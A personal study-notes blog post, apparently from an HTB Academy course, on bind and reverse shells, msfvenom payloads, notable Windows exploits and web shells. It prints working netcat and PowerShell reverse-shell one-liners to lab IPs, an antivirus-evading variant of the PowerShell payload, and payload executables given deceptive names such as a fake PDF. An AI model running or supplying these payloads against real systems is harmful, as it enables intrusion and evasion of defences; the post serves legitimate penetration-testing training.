File Nº 0x6D / Subject: m0rgxn
Local --:--:--
← All notesExhibit H · Filed 10 Jun 2026 · HTB Academy · 13 min read

Shells & Payloads

Filed

Exhibit H — cover
Every OS, provides a way to interact with physical hardware through something called a Terminal Emulator. A Command Line Interfaces ( which happens to be CLI as well lol) it's a ciombination of the operating system, the terminal emulator being used by the user and the Command Language Interpreter. The command language interpreter is a program that will translate the commands inputted by users to actual programs and it will issue the tasks for the operating system for processing. The most used command language interpreters in linux are bash,zsh,Ksh,sh. In a bind shell connection to a remote system the target system would have a listener on one of its ports, awaiting for a connection from the pentester's system.
Bind Shell Diagram
The pentester would connect directly with netcat IP PORT. A lot of prerequisites are demanded by this type of connection:
  • A listener has to be stood up in the target system.
  • Admins typically configure strict firewall rules and NAT on the edge of the network (public-facing), so we need to be already inside the internal network of the target system.
  • Operating systems( windows and linux) often block incoming connections that aren't associated with a trusted network-based application, good luck evading that. Here is an example of how we can connect to a target system listening for a connection using netcat : Here is the listener that gets set up on the target system. ( Looks a lot like mkfifo payload for reverse shells, only the netcat command differs).
Bash
Target@server:~$ rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l 10.129.41.200 7777 > /tmp/f
And the client connects normally.
Bash
m0rgxn@htb[/htb]$ nc -nv 10.129.41.200 7777
Target@server:~$
In reverse shells the pentester's system is the one setting up a listener, and the target server is the one connecting back to the listener.
Reverse Shell Diagram
A good practice for reverse shells as an attacker, is to use common ports as listening ports, this would ensure that the connection won't be blocked by the OS when going outbound, for example we can use 443 as it is very rare to find a any security team that blocks that outbound port, because a lot of applications rely on outbound connection to HTTPS to work, a simple and realistic use case of that would be fetching data from a public API for a hosted web application. Netcat is considered to be a swiss army knife since it can function over UDP, TCP and UNIX sockets. It can also use IPv4 and IPv6, opening and listening on sockets, serves as a proxy and dealing with text transfers. It is essential to know how everything is working under the hood, it would be very useful when it comes to troubleshooting connection problems and fixing them.
Bash
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 |  nc 10.10.14.12 7777 > /tmp/f
Let's break down the command into sections, rm -f /tmp/f ; mkfifo /tmp/f this attempts to create a FIFO named pipe file in /tmp/f. The cat /tmp/f | prints the named pipe file to the standard output before passing it as input to /bin/bash -i 2>&1 thanks to the pipe (|). The /bin/bash -i 2>&1 | sets the language interpreter using -i to ensure the shell is interactive with the filesystem. That gets redirected to the last part of the command which is nc 10.10.14.12 7777 > /tmp/f where the victim system connects to our attacker system via netcat and writes the output to the FIFO named pipe file, serving the Bash shell and waiting for our netcat listener.
Powershell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

The first part of the payload powershell -nop executes the powershell runtime with no profile. Then a TCP socket is created with "$client = New-Object System.Net.Sockets.TCPClient(10.10.14.158,443); with a .NET framework instance of System.Net.Sockets.TCPClient class to connect to our attacker machine via a TCP socket. $stream = $client.GetStream(); is used to facilitate network communication. [byte[]]$bytes = 0..65535|%{0}; This creates an array with 65535 zeros, which is an initialization of the byte stream that would be sent to our listener. Without diving too deep into the methods being called from the steam class, this next part while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) is used to populate the byte stream and making sure there are no null bytes left. This part {;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i); encodes the byte array as ASCII characters and creates a new array called data that has the ASCII encoded bytes from the bytes array. And then we Invoke-Expression against the new data array with this expression $sendback = (iex $data 2>&1 | Out-String ); which would execute the data array, which is essentially the commands ran from the reverse shell in the victim machine. We use this part $sendback2 = $sendback + 'PS ' + (pwd).path + '> '; (PS C:\Users\Administrator > this is the shell prompt ) to make the shell a little more better looking and make it easier to work with, but this simple string is sometimes detectable by AV. $sendbyte= ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()} this is the command that will send the data array ( the ASCII encoded byte stream ) via a TCP client to initiate a powershell session. Finally the $client.Close() would be used when the connection is terminated.
⚠️ AV (Anti-Virus) Error Warning When we try to run the powershell one-liner reverse shell payload and the AV rejects it, changing the payload a little would do the job considering that AV only does static analysis of the code and checks the variable names, filenames, etc. against a database and if it finds any matches it flags and denies the execution of the script or executable. In our case, changing the payload to something like this would bypass AV signature scan:
Powershell
powershell -nop -c "$c = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443);$s = $c.GetStream();[byte[]]$b = 0..65535|%{0};while(($i = $s.Read($bytes, 0, $b.Length)) -ne 0){;$m0rgxn = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sen = (iex $d 2>&1 | Out-String );$sen2 = $sen + 'M0RGXN ' + (pwd).Path + '> ';$senb = ([text.encoding]::ASCII).GetBytes($sen2);$s.Write($senb,0,$sendbyte.Length);$s.Flush()};$c.Close()"
A simple sed command would do the job automatically.
To see all the different payloads available with the current version installed of MSFvenom on the system we can run the following command:
Bash
m0rgxn@htb[/htb]$ msfvenom -l payloads
Here is an example output for that command:
Bash
    cmd/windows/smb/x64/custom/reverse_http                            Fetch and execute an x64 payload from an SMB server. Custom shellcode stage. Tunnel communication over HTTP (Windows x64 wininet)
    cmd/windows/smb/x64/custom/reverse_https                           Fetch and execute an x64 payload from an SMB server. Custom shellcode stage. Tunnel communication over HTTP (Windows x64 wininet)
    cmd/windows/smb/x64/custom/reverse_named_pipe                      Fetch and execute an x64 payload from an SMB server. Custom shellcode stage. Connect back to the attacker via a named pipe pivot
    cmd/windows/smb/x64/custom/reverse_tcp                             Fetch and execute an x64 payload from an SMB server. Custom shellcode stage. Connect back to the attacker (Windows x64)
    cmd/windows/smb/x64/custom/reverse_tcp_rc4                         Fetch and execute an x64 payload from an SMB server. Custom shellcode stage. Connect back to the attacker
    cmd/windows/smb/x64/custom/reverse_tcp_uuid                        Fetch and execute an x64 payload from an SMB server. Custom shellcode stage. Connect back to the attacker with UUID Support (Windows x64)
    cmd/windows/smb/x64/custom/reverse_winhttp                         Fetch and execute an x64 payload from an SMB server. Custom shellcode stage. Tunnel communication over HTTP (Windows x64 winhttp)
    cmd/windows/smb/x64/custom/reverse_winhttps                        Fetch and execute an x64 payload from an SMB server. Custom shellcode stage. Tunnel communication over HTTPS (Windows x64 winhttp)
    cmd/windows/smb/x64/download_exec                                  Fetch and execute an x64 payload from an SMB server.
    cmd/windows/smb/x64/encrypted_shell/reverse_tcp                    Fetch and execute an x64 payload from an SMB server. Spawn a piped command shell (staged). Connect to MSF and read in stage
    cmd/windows/smb/x64/encrypted_shell_reverse_tcp                    Fetch and execute an x64 payload from an SMB server. Connect back to attacker and spawn an encrypted command shell
    cmd/windows/smb/x64/exec                                           Fetch and execute an x64 payload from an SMB server. Execute an arbitrary command (Windows x64)
    cmd/windows/smb/x64/loadlibrary                                    Fetch and execute an x64 payload from an SMB server. Load an arbitrary x64 library path
    cmd/windows/smb/x64/messagebox                                     Fetch and execute an x64 payload from an SMB server. Spawn a dialog via MessageBox using a customizable title, text & icon
    cmd/windows/smb/x64/meterpreter/bind_ipv6_tcp                      Fetch and execute an x64 payload from an SMB server. Listen for an IPv6 connection (Windows x64)
    cmd/windows/smb/x64/meterpreter/bind_ipv6_tcp_uuid                 Fetch and execute an x64 payload from an SMB server. Listen for an IPv6 connection with UUID Support (Windows x64)
    cmd/windows/smb/x64/meterpreter/bind_named_pipe                    Fetch and execute an x64 payload from an SMB server. Listen for a pipe connection (Windows x64)
    cmd/windows/smb/x64/meterpreter/bind_tcp                           Fetch and execute an x64 payload from an SMB server. Listen for a connection (Windows x64)
    cmd/windows/smb/x64/meterpreter/bind_tcp_rc4                       Fetch and execute an x64 payload from an SMB server. Connect back to the attacker
    cmd/windows/smb/x64/meterpreter/bind_tcp_uuid                      Fetch and execute an x64 payload from an SMB server. Listen for a connection with UUID Support (Windows x64)
    cmd/windows/smb/x64/meterpreter/reverse_http                       Fetch and execute an x64 payload from an SMB server. Tunnel communication over HTTP (Windows x64 wininet)
    cmd/windows/smb/x64/meterpreter/reverse_https                      Fetch and execute an x64 payload from an SMB server. Tunnel communication over HTTP (Windows x64 wininet)
    cmd/windows/smb/x64/meterpreter/reverse_named_pipe                 Fetch and execute an x64 payload from an SMB server. Connect back to the attacker via a named pipe pivot
    cmd/windows/smb/x64/meterpreter/reverse_tcp                        Fetch and execute an x64 payload from an SMB server. Connect back to the attacker (Windows x64)
    cmd/windows/smb/x64/meterpreter/reverse_tcp_rc4                    Fetch and execute an x64 payload from an SMB server. Connect back to the attacker
    cmd/windows/smb/x64/meterpreter/reverse_tcp_uuid                   Fetch and execute an x64 payload from an SMB server. Connect back to the attacker with UUID Support (Windows x64)
    cmd/windows/smb/x64/meterpreter/reverse_winhttp                    Fetch and execute an x64 payload from an SMB server. Tunnel communication over HTTP (Windows x64 winhttp)
    cmd/windows/smb/x64/meterpreter/reverse_winhttps                   Fetch and execute an x64 payload from an SMB server. Tunnel communication over HTTPS (Windows x64 winhttp)
    cmd/windows/smb/x64/meterpreter_bind_named_pipe                    Fetch and execute an x64 payload from an SMB server. Connect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.
    cmd/windows/smb/x64/meterpreter_bind_tcp                           Fetch and execute an x64 payload from an SMB server. Connect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.
    cmd/windows/smb/x64/meterpreter_reverse_http                       Fetch and execute an x64 payload from an SMB server. Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.
    cmd/windows/smb/x64/meterpreter_reverse_https                      Fetch and execute an x64 payload from an SMB server. Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.
    cmd/windows/smb/x64/meterpreter_reverse_ipv6_tcp                   Fetch and execute an x64 payload from an SMB server. Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.
    cmd/windows/smb/x64/meterpreter_reverse_tcp                        Fetch and execute an x64 payload from an SMB server. Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.
    cmd/windows/smb/x64/peinject/bind_ipv6_tcp                         Fetch and execute an x64 payload from an SMB server. Listen for an IPv6 connection (Windows x64)
    cmd/windows/smb/x64/peinject/bind_ipv6_tcp_uuid                    Fetch and execute an x64 payload from an SMB server. Listen for an IPv6 connection with UUID Support (Windows x64)
    cmd/windows/smb/x64/peinject/bind_named_pipe                       Fetch and execute an x64 payload from an SMB server. Listen for a pipe connection (Windows x64)
    cmd/windows/smb/x64/peinject/bind_tcp                              Fetch and execute an x64 payload from an SMB server. Listen for a connection (Windows x64)
    cmd/windows/smb/x64/peinject/bind_tcp_rc4                          Fetch and execute an x64 payload from an SMB server. Connect back to the attacker
    cmd/windows/smb/x64/peinject/bind_tcp_uuid                         Fetch and execute an x64 payload from an SMB server. Listen for a connection with UUID Support (Windows x64)
    cmd/windows/smb/x64/peinject/reverse_named_pipe                    Fetch and execute an x64 payload from an SMB server. Connect back to the attacker via a named pipe pivot
    cmd/windows/smb/x64/peinject/reverse_tcp                           Fetch and execute an x64 payload from an SMB server. Connect back to the attacker (Windows x64)
    cmd/windows/smb/x64/peinject/reverse_tcp_rc4                       Fetch and execute an x64 payload from an SMB server. Connect back to the attacker
    cmd/windows/smb/x64/peinject/reverse_tcp_uuid                      Fetch and execute an x64 payload from an SMB server. Connect back to the attacker with UUID Support (Windows x64)
    cmd/windows/smb/x64/pingback_reverse_tcp                           Fetch and execute an x64 payload from an SMB server. Connect back to attacker and report UUID (Windows x64)
    cmd/windows/smb/x64/powershell_bind_tcp                            Fetch and execute an x64 payload from an SMB server.
    cmd/windows/smb/x64/powershell_reverse_tcp                         Fetch and execute an x64 payload from an SMB server.
    cmd/windows/smb/x64/powershell_reverse_tcp_ssl                     Fetch and execute an x64 payload from an SMB server.
    cmd/windows/smb/x64/shell/bind_ipv6_tcp                            Fetch and execute an x64 payload from an SMB server. Spawn a piped command shell (Windows x64) (staged). Listen for an IPv6 connection (Windows x64)
    cmd/windows/smb/x64/shell/bind_ipv6_tcp_uuid                       Fetch and execute an x64 payload from an SMB server. Spawn a piped command shell (Windows x64) (staged). Listen for an IPv6 connection with UUID Support (Windows x64)

We can see that we can get a lot of information from the name of the payload, such as the os, arch and shell interpreter it returns. The following example will build a linux payload for 64-bit architectures.
Bash
m0rgxn@htb[/htb]$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f elf > createbackup.elf 

[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload 

[-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 

74 bytes Final size of elf file: 194 bytes
Here is an example of a windows payload as well. We can change the file format based on situations.
Bash
m0rgxn@htb[/htb]$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f exe > BonusCompensationPlanpdf.exe

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload 

[-] No arch selected, selecting arch: x86 from the payload No encoder specified, outputting raw payload Payload size: 

324 bytes Final size of exe file: 73802 bytes
  • MS08-067: MS08-067 was a critical patch pushed out to many different Windows revisions due to an SMB flaw. This flaw made it extremely easy to infiltrate a Windows host. It was so efficient that the Conficker worm was using it to infect every vulnerable host it came across. Even Stuxnet took advantage of this vulnerability.
  • Eternal Blue: MS17-010 is an exploit leaked in the Shadow Brokers dump from the NSA. This exploit was most notably used in the WannaCry ransomware and NotPetya cyber attacks. This attack took advantage of a flaw in the SMB v1 protocol allowing for code execution. EternalBlue is believed to have infected upwards of 200,000 hosts just in 2017 and is still a common way to find access into a vulnerable Windows host.
  • Print Nightmare: A remote code execution vulnerability in the Windows Print Spooler. With valid credentials for that host or a low privilege shell, you can install a printer, add a driver that runs for you, and grants you system-level access to the host. This vulnerability has been ravaging companies through 2021.
  • BlueKeep: CVE 2019-0708 is a vulnerability in Microsoft's RDP protocol that allows for Remote Code Execution. This vulnerability took advantage of a miss-called channel to gain code execution, affecting every Windows revision from Windows 2000 to Server 2008 R2.
  • Sigred: CVE 2020-1350 utilized a flaw in how DNS reads SIG resource records. It is a bit more complicated than the other exploits on this list, but if done correctly, it will give the attacker Domain Admin privileges since it will affect the domain's DNS server which is commonly the primary Domain Controller.
  • SeriousSam: CVE 2021-36934 exploits an issue with the way Windows handles permission on the C:\Windows\system32\config folder. Before fixing the issue, non-elevated users have access to the SAM database, among other files. This is not a huge issue since the files can't be accessed while in use by the pc, but this gets dangerous when looking at volume shadow copy backups. These same privilege mistakes exist on the backup files as well, allowing an attacker to read the SAM database, dumping credentials.
  • Zerologon: CVE 2020-1472 is a critical vulnerability that exploits a cryptographic flaw in Microsoft’s Active Directory Netlogon Remote Protocol (MS-NRPC). It allows users to log on to servers using NT LAN Manager (NTLM) and even send account changes via the protocol. The attack can be a bit complex, but it is trivial to execute since an attacker would have to make around 256 guesses at a computer account password before finding what they need. This can happen in a matter of a few seconds.
This banner grabbing technique is done by connecting to an open TCP port and returns anything that the host sends in the connection, helping us fingerprint services and possibly finding vulnerable versions associated with services.
Bash
m0rgxn@htb[/htb]$ sudo nmap -v 192.168.86.39 --script banner.nse

Starting Nmap 7.92 ( https://nmap.org ) at 2021-09-20 18:01 EDT
NSE: Loaded 1 scripts for scanning.
<snip>
Discovered open port 135/tcp on 192.168.86.39
Discovered open port 139/tcp on 192.168.86.39
Discovered open port 445/tcp on 192.168.86.39
Discovered open port 443/tcp on 192.168.86.39
Discovered open port 912/tcp on 192.168.86.39
Discovered open port 902/tcp on 192.168.86.39
Completed SYN Stealth Scan at 18:01, 1.46s elapsed (1000 total ports)
NSE: Script scanning 192.168.86.39.
Initiating NSE at 18:01
Completed NSE at 18:01, 20.11s elapsed
Nmap scan report for desktop-jba7h4t.lan (192.168.86.39)
Host is up (0.012s latency).
Not shown: 994 closed tcp ports (reset)
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
443/tcp open  https
445/tcp open  microsoft-ds
902/tcp open  iss-realsecure
| banner: 220 VMware Authentication Daemon Version 1.10: SSL Required, Se
|_rverDaemonProtocol:SOAP, MKSDisplayProtocol:VNC , , NFCSSL supported/t
912/tcp open  apex-mesh
| banner: 220 VMware Authentication Daemon Version 1.0, ServerDaemonProto
|_col:SOAP, MKSDisplayProtocol:VNC , ,
MAC Address: DC:41:A9:FB:BA:26 (Intel Corporate)

As mentioned before when it comes to creating payloads on windows, we have plenty options to choose from, .exe executables, DLLs ( Dynamic Linked Library files ), batch files ,MSI packages and even Powershell scripts. Here is a little background on those file types and how they're used by the windows OS.
    • DLLs A Dynamic Linking Library (DLL) is a library file used in Microsoft operating systems to provide shared code and data that can be used by many different programs at once. These files are modular and allow us to have applications that are more dynamic and easier to update. As a pentester, injecting a malicious DLL or hijacking a vulnerable library on the host can elevate our privileges to SYSTEM and/or bypass User Account Controls.
    • Batch Batch files are text-based DOS scripts utilized by system administrators to complete multiple tasks through the command-line interpreter. These files end with an extension of .bat. We can use batch files to run commands on the host in an automated fashion. For example, we can have a batch file open a port on the host, or connect back to our attacking box. Once that is done, it can then perform basic enumeration steps and feed us info back over the open port.
    • VBS VBScript is a lightweight scripting language based on Microsoft's Visual Basic. It is typically used as a client-side scripting language in webservers to enable dynamic web pages. VBS is dated and disabled by most modern web browsers but lives on in the context of Phishing and other attacks aimed at having users perform an action such as enabling the loading of Macros in an excel document or clicking on a cell to have the Windows scripting engine execute a piece of code.
    • MSI .MSI files serve as an installation database for the Windows Installer. When attempting to install a new application, the installer will look for the .msi file to understand all of the components required and how to find them. We can use the Windows Installer by crafting a payload as an .msi file. Once we have it on the host, we can run msiexec to execute our file, which will provide us with further access, such as an elevated reverse shell.
    • Powershell Powershell is both a shell environment and scripting language. It serves as Microsoft's modern shell environment in their operating systems. As a scripting language, it is a dynamic language based on the .NET Common Language Runtime that, like its shell component, takes input and output as .NET objects. PowerShell can provide us with a plethora of options when it comes to gaining a shell and execution on a host, among many other steps in our penetration testing process.
Info: Windows AV evasion I have struggled in the past with AV evasion while creating an Active Directory lab, so I had to turn off Anti-Virus in order to attack, the tool below is utilized to obfuscate binaries. Here
Let's say a user has downloaded our payload from a phishing email. Once a payload is downloaded, what makes the user execute it though? That can be a challenge on its own. We can rely on social engineering for example by changing the filename to something trippy that would fool the user but that would only take us so far. So we can rely on the following methods, for automated delivery and execution of our payload. This would sometime need initial access and the right permission though.
  • Impacket: Impacket is a toolset built in Python that provides us with a way to interact with network protocols directly. Some of the most exciting tools we care about in Impacket deal with psexec, smbclient, wmi, Kerberos, and the ability to stand up an SMB server.
  • PayloadAllTheThings
  • SMB: SMB can provide an easy to exploit route to transfer files between hosts. This can be especially useful when the victim hosts are domain joined and utilize shares to host data. We, as attackers, can use these SMB file shares along with C$ and admin$ to host and transfer our payloads and even exfiltrate data over the links.
  • Remote execution via MSF: Built into many of the exploit modules in Metasploit is a function that will build, stage, and execute the payloads automatically.
  • Other Protocols: When looking at a host, protocols such as FTP, TFTP, HTTP/S, and more can provide you with a way to upload files to the host. Enumerate and pay attention to the functions that are open and available for use. We focus a lot more on payload delivery in the File Transfers module in the blog.
After establishing a shell session on the target machine, the shell we would have access to is very limited and can sometime be a jail shell. So to upgrade and stabilize our shell we spawn a TTY bourne shell using this python command python3 -c 'import pty; pty.spawn("/bin/bash") In case python is not installed on the target machine, we have a few alternatives to accomplish an stabler shell on the target system:
  • Perl : perl -e 'exec "/bin/sh";'
  • Ruby: ruby: exec "/bin/sh" ( inside interpreter )
  • awk: awk 'BEGIN {system("/bin/sh")}'
  • Find: find / -name nameoffile -exec /bin/awk 'BEGIN {system("/bin/sh")}' \;
  • Lua : lua: os.execute('/bin/sh')
  • FInd with -exec : find . -exec /bin/sh \; -quit
  • Vim: vim -c ':!/bin/sh'
  • Vim escape:
vim 
:set shell=/bin/sh 
:shell
https://github.com/jbarcia/Web-Shells/blob/master/laudanum/php/shell.php Laudanum is a repository of ready-made files that can be used to inject onto a victim and receive back access via a reverse shell, run commands on the victim host right from the browser, and more. The repo includes injectable files for many different web application languages to include asp, aspx, jsp, php, and more. This is a staple to have on any pentest. If you are using your own VM, Laudanum is built into Parrot OS and Kali by default. For any other distro, you will likely need to pull a copy down to use. Antak is a webshell built in ASP.NET part of the nishang project. Antak utilizes PowerShell to interact with the host, making it great for acquiring a web shell on a Windows server. The UI is even themed like PowerShell. It's time to dive in and experiment with Antak. Antak is themed just like powershell console a lot, however it spawns a new process for each command.
Antak Webshell Interface
When utilizing web shells, consider the below potential issues that may arise during your penetration testing process:
  • Web applications sometimes automatically delete files after a pre-defined period
  • Limited interactivity with the operating system in terms of navigating the file system, downloading and uploading files, chaining commands together may not work (ex. whoami && hostname), slowing progress, especially when performing enumeration -Potential instability through a non-interactive web shell
  • Greater chance of leaving behind proof that we were successful in our attack
§ — Also in evidenceView all →

Other exhibits


Exhibit L · 04 Sept 2026

SQL Injection

PortSwigger Web Security Academy notes on detecting and exploiting SQL injection, from UNION attacks to blind and out-of-band techniques

Filed
Exhibit K · 18 Aug 2026 · Azure Security

Modeling Managed-Identity Privilege Escalation as an Attack Graph

A framework for treating Azure managed-identity abuse in hybrid Entra ID environments as a graph-reachability problem. I define the node and edge types, ground each edge in Azure RBAC semantics, show how my tool Fenrir uses the model to answer one question conservatively, and work through a case study in my own lab. Framework and systematization, not an empirical study.

Filed
§ Contents